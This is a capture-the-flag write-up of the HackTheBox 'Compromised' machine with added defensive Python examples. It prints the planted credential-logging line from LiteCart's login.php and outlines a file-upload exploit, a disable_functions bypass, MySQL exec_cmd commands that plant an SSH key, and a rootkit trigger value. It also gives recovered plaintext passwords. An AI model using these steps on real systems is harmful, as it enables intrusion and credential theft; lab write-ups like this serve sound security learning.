HackTheBox - Compromised

Nmap scan results

Adding compromised.htb to the /etc/hosts file. Also starting an all-port scan in the background.

Using gobuster to scan for directories and files
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://compromised.htb/ -o go-dirscan.out -x php,html,tx



Using timestamps to get recently modified files
Now that we have a backup of the running CMS, we can search it for config files. There is a trick I learned from ippsec: use timestamps to find the recently modified files.
find . -printf "%T+ %p\n" -type f | sort -u

2020-09-03+17:19:16.0000000000 ./includes/library
2020-09-03+17:19:16.0000000000 ./includes/library/lib_user.inc.php
2020-09-03+17:20:34.0000000000 ./admin/login.php
2020-09-03+17:20:56.0000000000 ./admin
// These were the recently modified files
<?php
// ./admin/login.php, one of the recently modified files. The commented-out
// file_put_contents() line in the login handler is not part of stock LiteCart.
require_once('../includes/app_header.inc.php');
document::$template = settings::get('store_template_admin');
document::$layout = 'login';
if (!empty($_GET['redirect_url'])) {
    $redirect_url = (basename(parse_url($_REQUEST['redirect_url'], PHP_URL_PATH)) != basename(__FILE__)) ? $_REQUEST['redirect_url'] : document::link(WS_DIR_ADMIN);
} else {
    $redirect_url = document::link(WS_DIR_ADMIN);
}
header('X-Robots-Tag: noindex');
document::$snippets['head_tags']['noindex'] = '<meta name="robots" content="noindex" />';
if (!empty(user::$data['id'])) notices::add('notice', language::translate('text_already_logged_in', 'You are already logged in'));
if (isset($_POST['login'])) {
    // Writes every submitted username and password to a hidden file in the admin directory
    //file_put_contents("./.log2301c9430d8593ae.txt", "User: " . $_POST['username'] . " Passwd: " . $_POST['password']);
    user::login($_POST['username'], $_POST['password'], $redirect_url, isset($_POST['remember_me']) ? $_POST['remember_me'] : false);
}
if (empty($_POST['username']) && !empty($_SERVER['PHP_AUTH_USER'])) $_POST['username'] = !empty($_SERVER['PHP_AUTH_USER']) ? $_SERVER['PHP_AUTH_USER'] : '';
$page_login = new view();
$page_login->snippets = array(
    'action' => $redirect_url,
);
echo $page_login->stitch('pages/login');
require_once vmod::check(FS_DIR_HTTP_ROOT . WS_DIR_INCLUDES . 'app_footer.inc.php');
?>
if (isset($_POST['login'])) {
    //file_put_contents("./.log2301c9430d8593ae.txt", "User: " . $_POST['username'] . " Passwd: " . $_POST['password']);
    user::login($_POST['username'], $_POST['password'], $redirect_url, isset($_POST['remember_me']) ? $_POST['remember_me'] : false);
}
The above code logs the admin username and password into the .log2301c9430d8593ae.txt file. Maybe we can still access that file; let's try.
User: admin Passwd: theNextGenSt0r3!~
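The two checks above (recently modified files, then a credential-logging line hidden in the login handler) are exactly what an incident responder runs over a web root after a suspected compromise. The following is an added example, not code from the write-up or from LiteCart: it reproduces the `find`-by-mtime triage in Python and then scans the recently modified PHP files for lines that write a submitted password to disk. The sample web root, file names and the `.log-example.txt` name it contains are constructed for the example.

```python
import os
import re
import tempfile
import time

# A line is suspicious when a write/log sink and a submitted credential field occur together.
# Both patterns are constructed for this example; the page's own indicator is the
# file_put_contents(... $_POST['password'] ...) line in admin/login.php.
CRED_SINKS = re.compile(r"(file_put_contents|fwrite|fputs|error_log|mail)\s*\(")
CRED_SOURCES = re.compile(
    r"\$_(POST|REQUEST|GET)\s*\[\s*['\"](pass(word|wd)?|pwd|username|user)['\"]\s*\]", re.I)


def recently_modified(root, since_epoch):
    """(mtime, relpath) for regular files under root modified at or after since_epoch, newest
    first. Same idea as: find . -printf "%T+ %p\n" -type f | sort"""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            mtime = os.stat(path).st_mtime
            if mtime >= since_epoch:
                hits.append((mtime, os.path.relpath(path, root)))
    return sorted(hits, reverse=True)


def credential_logging_lines(path):
    """(lineno, line) pairs where a sink and a credential field share a line. Commented-out
    lines are reported too: a commented backdoor still proves the file was tampered with."""
    flagged = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            if CRED_SINKS.search(line) and CRED_SOURCES.search(line):
                flagged.append((lineno, line.strip()))
    return flagged


def triage(root, since_epoch, extensions=(".php", ".inc")):
    """Scan only the recently modified PHP sources for credential-logging lines."""
    report = {}
    for _mtime, rel in recently_modified(root, since_epoch):
        if rel.endswith(extensions):
            hits = credential_logging_lines(os.path.join(root, rel))
            if hits:
                report[rel] = hits
    return report


def build_sample_tree():
    """Constructed web root: an old config, a fresh but clean include, a tampered login page."""
    root = tempfile.mkdtemp(prefix="webroot-")
    os.makedirs(os.path.join(root, "admin"))
    os.makedirs(os.path.join(root, "includes"))
    files = {
        "includes/config.inc.php": "<?php\ndefine('DB_TYPE', 'mysql');\n",
        "includes/lib_user.inc.php":
            "<?php\nclass user { static function login($u, $p) { return true; } }\n",
        "admin/login.php": (
            "<?php\nif (isset($_POST['login'])) {\n"
            "//file_put_contents(\"./.log-example.txt\", \"User: \" . $_POST['username']"
            " . \" Passwd: \" . $_POST['password']);\n"
            "user::login($_POST['username'], $_POST['password']);\n}\n"
        ),
    }
    for rel, body in files.items():
        with open(os.path.join(root, rel), "w") as fh:
            fh.write(body)
    # Backdate the config so that only the include and the login page count as recent.
    old = time.time() - 365 * 86400
    os.utime(os.path.join(root, "includes/config.inc.php"), (old, old))
    return root


def run_demo():
    root = build_sample_tree()
    since = time.time() - 86400  # files touched in the last 24 hours
    return recently_modified(root, since), triage(root, since)


if __name__ == "__main__":
    recent, report = run_demo()
    for mtime, rel in recent:
        print(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(mtime)), rel)
    for rel, hits in report.items():
        for lineno, line in hits:
            print(f"{rel}:{lineno}: {line}")
```

The mtime filter keeps the content scan cheap on a large CMS tree; on a real system, compare the flagged files against the vendor's release tarball as well, since an attacker can reset timestamps with `touch`.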
Exploiting LiteCart (Vulnerable to Arbitrary File Upload)
Version Used : LiteCart 2.1.2


Upload a PHP file and change the Content-Type to application/xml.

Now visit http://compromised.htb/shop/vqmod/xml/demo.php and you should get the following page.

PHP disable_functions bypass
The only problem is that we can't run system commands from PHP. This may be because of PHP's disable_functions setting; to check, we can call phpinfo().

There are two ways to get a shell on the box. The first is to use weevely (Weevely is a stealth PHP web shell that simulates a telnet-like connection. It is an essential tool for web application post-exploitation, and can be used as a stealth backdoor or as a web shell to manage legitimate web accounts, even free hosted ones.) and the other is to use the disable_functions bypass - PHP 7.0-7.4 script.
Get the exploit from here and upload it. We can even modify the script a bit to accept a GET/POST request and execute it, rather than manually entering the values.


We can't get a reverse shell because of the firewall rules. To check the iptables rules, we can browse to /etc/iptables and list the rules.
# Generated by iptables-save v1.6.1 on Mon May 11 02:27:29 2020
*filter
:INPUT DROP [6:1032]
:FORWARD DROP [0:0]
:OUTPUT DROP [5:394]
-A INPUT -i lo -j ACCEPT
-A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -m tcp -j ACCEPT
-A INPUT -p tcp -m tcp --dport 80 -m tcp -j ACCEPT
-A INPUT -p icmp -m icmp --icmp-type 0 -j ACCEPT
-A INPUT -p icmp -m icmp --icmp-type 8 -j ACCEPT
-A OUTPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 22 -m tcp -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 80 -m tcp -j ACCEPT
COMMIT
# Completed on Mon May 11 02:27:29 2020
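To see why this ruleset blocks a reverse shell but still lets the web application answer requests, it helps to evaluate packets against the chains the way the kernel does: first matching rule wins, otherwise the chain policy applies. The following is an added example (not part of the write-up) that parses the iptables-save dump above and evaluates a few packets; it understands only the options this dump uses, and the `shlex`, `verdict` and `egress_summary` names are the example's own.

```python
import shlex

# The iptables-save dump from the page, minus the comment lines.
RULESET = """\
*filter
:INPUT DROP [6:1032]
:FORWARD DROP [0:0]
:OUTPUT DROP [5:394]
-A INPUT -i lo -j ACCEPT
-A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -m tcp -j ACCEPT
-A INPUT -p tcp -m tcp --dport 80 -m tcp -j ACCEPT
-A INPUT -p icmp -m icmp --icmp-type 0 -j ACCEPT
-A INPUT -p icmp -m icmp --icmp-type 8 -j ACCEPT
-A OUTPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 22 -m tcp -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 80 -m tcp -j ACCEPT
COMMIT
"""


def parse_ruleset(text):
    """Return ({chain: policy}, [rule]) from iptables-save output (subset of options only)."""
    policies, rules = {}, []
    for line in text.splitlines():
        if line.startswith(":"):
            chain, policy = line[1:].split()[:2]
            policies[chain] = policy
        elif line.startswith("-A "):
            toks = shlex.split(line)
            rule = {"chain": toks[1], "match": {}, "target": None}
            i = 2
            while i < len(toks):
                opt, arg = toks[i], toks[i + 1]
                if opt == "-j":
                    rule["target"] = arg
                elif opt == "-p":
                    rule["match"]["proto"] = arg
                elif opt in ("-i", "-o"):
                    rule["match"]["iface"] = arg
                elif opt == "--dport":
                    rule["match"]["dport"] = int(arg)
                elif opt == "--sport":
                    rule["match"]["sport"] = int(arg)
                elif opt == "--state":
                    rule["match"]["state"] = set(arg.split(","))
                elif opt == "--icmp-type":
                    rule["match"]["icmp_type"] = int(arg)
                # "-m <ext>" only loads a match extension and compares nothing; skip it
                i += 2
            rules.append(rule)
    return policies, rules


def _matches(match, pkt):
    for key, want in match.items():
        if key == "state":
            if pkt.get("state") not in want:
                return False
        elif pkt.get(key) != want:
            return False
    return True


def verdict(chain, pkt, policies, rules):
    """First matching rule decides; otherwise the chain policy applies."""
    for rule in rules:
        if rule["chain"] == chain and _matches(rule["match"], pkt):
            return rule["target"]
    return policies[chain]


def egress_summary(text):
    """Evaluate the packets that matter for this box against the parsed ruleset."""
    policies, rules = parse_ruleset(text)
    ephemeral = 51000  # constructed client-side port
    return {
        # a reverse shell is a NEW outbound connection to the attacker's listener
        "reverse_shell": verdict("OUTPUT", {"proto": "tcp", "sport": ephemeral,
                                            "dport": 4444, "state": "NEW"}, policies, rules),
        # the web server's replies belong to a flow the client opened, so they are ESTABLISHED
        "http_reply": verdict("OUTPUT", {"proto": "tcp", "sport": 80,
                                         "dport": ephemeral, "state": "ESTABLISHED"}, policies, rules),
        "inbound_ssh": verdict("INPUT", {"proto": "tcp", "sport": ephemeral,
                                         "dport": 22, "state": "NEW"}, policies, rules),
        "inbound_other": verdict("INPUT", {"proto": "tcp", "sport": ephemeral,
                                           "dport": 4444, "state": "NEW"}, policies, rules),
    }


if __name__ == "__main__":
    for name, result in egress_summary(RULESET).items():
        print(f"{name:14s} {result}")
```

The `OUTPUT DROP` policy with only `RELATED,ESTABLISHED` and source ports 22/80 accepted is a reasonable egress posture for a single-purpose web host: anything that must talk out has to ride on a connection a client opened, which is precisely the channel a forward shell uses.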
Instead we can use a forward shell.
Using a forward shell to get shell access

We can even upgrade the shell (it uses pty from Python) by typing the upgrade command.

Misconfiguration in MySQL
// Database Configs
define('DB_TYPE', 'mysql');
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'root');
define('DB_PASSWORD', 'changethis');
define('DB_DATABASE', 'ecom');
define('DB_TABLE_PREFIX', 'lc_');
define('DB_CONNECTION_CHARSET', 'utf8');
define('DB_PERSISTENT_CONNECTIONS', 'false');
The mysql user has been given a login shell. Usually it is set to /bin/false, but here it is set to /bin/bash, which is strange. That means we can SSH in as that user.
mysql:x:111:113:MySQL Server,,,:/var/lib/mysql:/bin/bash
Let's see if MySQL has a UDF (user-defined function) present. We have creds to connect.

Looks like we can run commands as the mysql user.

One thing we can do is create a .ssh directory and copy our public key into it. This is how we get a shell as mysql over SSH.
# Create a pair of SSH keys on the attacking machine
ssh-keygen -f mysql
-- Then, from the MySQL client, use the exec_cmd UDF to place the public key in mysql's home directory
select exec_cmd('mkdir .ssh');
select exec_cmd('echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCkB5LPkMjts3c9RE8ea1ftX+xMCA2ppgNYP5B1mxkW/3vR185WS+KamWjrTZ3NImNkWuC2MEn1og6aIUZ4R0jPvccHeX0urY2wH4AFnjKL6Hu03hra2HWt3ca2SgiKgKHjZUWWlVeow5tTlWSDgJQ12faugpn6sWfPYmPMX/iVIiCBRbURVRDQP+7c/MUCqEmtITwH8atCFNyjLHM7B9d210SJb+1eP++ZDydFFpd1bMhe79ABwHY5YC1Lm3h0cZTYjGicbwVp0RLIUIrtyz0Y8u/I+2nZyINLYEYeIUDavLBK/B/BrX8NgsQoH/n9cEboBKN+MSsaWYx3exIXB8chUZkoPQ4xff3qfiGYsO5xO2GnBscmkicGWTNOXKpGj9iYZTX654XtUBRBJwcJFuxg46i+9SNlkxj/xHLYeIHfBNPe+DyRgg2k/E4bTnzbC8La1Sa3CJpMUqzPWRwrhBeLrp2ThowNOuDYokjYBpeAu6tA2XyDPGfCZkhvntncV5U= root@LAPTOP-UFMALO92" > .ssh/authorized_keys');
select exec_cmd('chmod 600 .ssh/authorized_keys');
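Both findings in this section, a service account with an interactive shell and a key planted in its home directory, are things a hardening audit should catch before anyone else does. The following is an added example, not from the write-up: it parses an /etc/passwd excerpt (constructed, apart from the mysql line quoted above), flags system accounts whose shell is interactive, checks their home directories for an authorized_keys file, and emits the remediation commands. The UID threshold, the non-login shell list and the `run_demo` fake filesystem root are the example's own assumptions.

```python
import os
import tempfile

# Constructed /etc/passwd excerpt; the mysql line is the one found on the box.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
mysql:x:111:113:MySQL Server,,,:/var/lib/mysql:/bin/bash
sysadmin:x:1000:1000:sysadmin:/home/sysadmin:/bin/bash
"""

NON_LOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}
FIRST_REGULAR_UID = 1000  # Debian/Ubuntu convention: UIDs below this belong to system accounts


def parse_passwd(text):
    entries = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, uid, gid, gecos, home, shell = line.split(":")
        entries.append({"name": name, "uid": int(uid), "gid": int(gid),
                        "gecos": gecos, "home": home, "shell": shell})
    return entries


def is_service_account(entry):
    return 0 < entry["uid"] < FIRST_REGULAR_UID  # root (uid 0) is audited separately


def service_accounts_with_shells(entries):
    """System accounts whose login shell is interactive (the mysql finding from the box)."""
    return [e["name"] for e in entries
            if is_service_account(e) and e["shell"] not in NON_LOGIN_SHELLS]


def stray_authorized_keys(entries, root="/"):
    """(account, path) for service accounts whose home carries .ssh/authorized_keys.
    `root` lets the check run against a mounted image instead of the live filesystem."""
    found = []
    for e in entries:
        if is_service_account(e):
            path = os.path.join(root, e["home"].lstrip("/"), ".ssh", "authorized_keys")
            if os.path.isfile(path):
                found.append((e["name"], "/" + os.path.relpath(path, root)))
    return found


def remediation(entries, root="/"):
    """Commands to review and run by hand: lock the shell, remove the planted key."""
    cmds = [f"usermod -s /usr/sbin/nologin {name}"
            for name in service_accounts_with_shells(entries)]
    cmds += [f"rm -i {path}" for _name, path in stray_authorized_keys(entries, root)]
    return cmds


def run_demo():
    """Fake filesystem root with a key planted under /var/lib/mysql, then the audit."""
    root = tempfile.mkdtemp(prefix="fsroot-")
    ssh_dir = os.path.join(root, "var/lib/mysql/.ssh")
    os.makedirs(ssh_dir)
    with open(os.path.join(ssh_dir, "authorized_keys"), "w") as fh:
        fh.write("ssh-rsa AAAA-constructed-placeholder-key root@attacker\n")  # constructed
    entries = parse_passwd(PASSWD_SAMPLE)
    return {
        "shells": service_accounts_with_shells(entries),
        "keys": stray_authorized_keys(entries, root),
        "fix": remediation(entries, root),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
```

Pair the shell check with `AllowUsers`/`DenyUsers` in sshd_config: even if a service account keeps a shell for maintenance scripts, it should not be able to authenticate over SSH at all.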

Analyzing the strace-log.dat (Keylogger)

This strace-log.dat file logs all the keys; if you look at it carefully you can see a pattern. See the screenshot below.

mysql -u root --password 3*NLJE32I$Fe

Also the password for sysadmin : 3*NLJE32I$Fe
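Reading a keylogger's strace output by eye works once; a parser is what an analyst wants when the file is large. The following is an added example, not part of the write-up, working on a constructed `strace -f -tt` style log rather than the real strace-log.dat (whose exact layout may differ). It pulls passwords passed on the command line out of `execve` lines and reassembles the single-byte `read(0, ...)` calls into the lines the user typed, treating DEL as a backspace. The log lines, PID and the `Example-P4ss` value are constructed.

```python
import ast
import os
import re
from collections import defaultdict

# Constructed strace -f -tt style log: a mysql client started with the password in argv,
# then the single-byte reads of what was typed at the prompt ("show d", backspace, ...).
SAMPLE_LOG = r"""22102 03:11:09 execve("/usr/bin/mysql", ["mysql", "-u", "root", "--password=Example-P4ss"], 0x5601f0 /* 21 vars */) = 0
22102 03:11:10 read(0, "s", 1) = 1
22102 03:11:10 read(0, "h", 1) = 1
22102 03:11:10 read(0, "o", 1) = 1
22102 03:11:10 read(0, "w", 1) = 1
22102 03:11:10 read(0, " ", 1) = 1
22102 03:11:11 read(0, "d", 1) = 1
22102 03:11:11 read(0, "b", 1) = 1
22102 03:11:11 read(0, "\177", 1) = 1
22102 03:11:11 read(0, "a", 1) = 1
22102 03:11:11 read(0, "t", 1) = 1
22102 03:11:11 read(0, "a", 1) = 1
22102 03:11:12 read(0, "b", 1) = 1
22102 03:11:12 read(0, "a", 1) = 1
22102 03:11:12 read(0, "s", 1) = 1
22102 03:11:12 read(0, "e", 1) = 1
22102 03:11:12 read(0, "s", 1) = 1
22102 03:11:12 read(0, ";", 1) = 1
22102 03:11:12 read(0, "\n", 1) = 1
"""

EXECVE_RE = re.compile(r'execve\("([^"]+)", (\[.*?\]), ')
READ_RE = re.compile(r'^(\d+) [\d:.]+ read\(0, "(.*)", 1\) = 1$')
MYSQL_TOOLS = {"mysql", "mysqldump", "mysqladmin"}


def password_in_argv(prog, argv):
    """The password if a command line carries one: --password=X anywhere, -pX for mysql tools."""
    for arg in argv[1:]:
        if arg.startswith("--password=") and len(arg) > len("--password="):
            return arg[len("--password="):]
        if os.path.basename(prog) in MYSQL_TOOLS and arg.startswith("-p") and len(arg) > 2:
            return arg[2:]
    return None


def execve_credentials(lines):
    """(program, password) for every execve that passes a password on the command line."""
    found = []
    for line in lines:
        m = EXECVE_RE.search(line)
        if m:
            # strace prints argv as a C-style string list; Python's literal parser reads it
            prog, argv = m.group(1), ast.literal_eval(m.group(2))
            pw = password_in_argv(prog, argv)
            if pw:
                found.append((prog, pw))
    return found


def typed_lines(lines):
    """Reassemble keystrokes from read(0, "<byte>", 1) calls per PID; DEL (\\177) is backspace."""
    buffers, result = defaultdict(str), defaultdict(list)
    for line in lines:
        m = READ_RE.match(line)
        if not m:
            continue
        pid, ch = m.group(1), ast.literal_eval('"' + m.group(2) + '"')
        if ch == "\x7f":
            buffers[pid] = buffers[pid][:-1]
        elif ch in ("\n", "\r"):
            result[pid].append(buffers[pid])
            buffers[pid] = ""
        else:
            buffers[pid] += ch
    return dict(result)


def run_demo():
    lines = SAMPLE_LOG.splitlines()
    return execve_credentials(lines), typed_lines(lines)


if __name__ == "__main__":
    creds, typed = run_demo()
    for prog, pw in creds:
        print(f"password on command line: {prog} -> {pw}")
    for pid, cmds in typed.items():
        for cmd in cmds:
            print(f"pid {pid} typed: {cmd}")
```

The first detector is also useful outside incident response: anything that records process command lines (auditd, EDR, `ps` snapshots) exposes passwords passed as arguments, which is why the mysql client warns about it and why option files or `MYSQL_PWD` are preferred.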

Exploiting LD_PRELOAD Rootkit (libdate.so)

We can analyze the libdate.so file in Ghidra. Get the file using scp.
scp sysadmin@10.10.10.207:/lib/x86_64-linux-gnu/libdate.so .

Reading through the local_x variables: if the input is equal to them, the library runs /bin/sh. Let's decode those variable values using CyberChef.
Decoded Value : 2wkeOU4sjv84ok/
So when a SUID binary (one that accepts input from the user) is executed and we enter the value we just decoded, we get a root shell. Let's try that on the su (substitute user) binary.
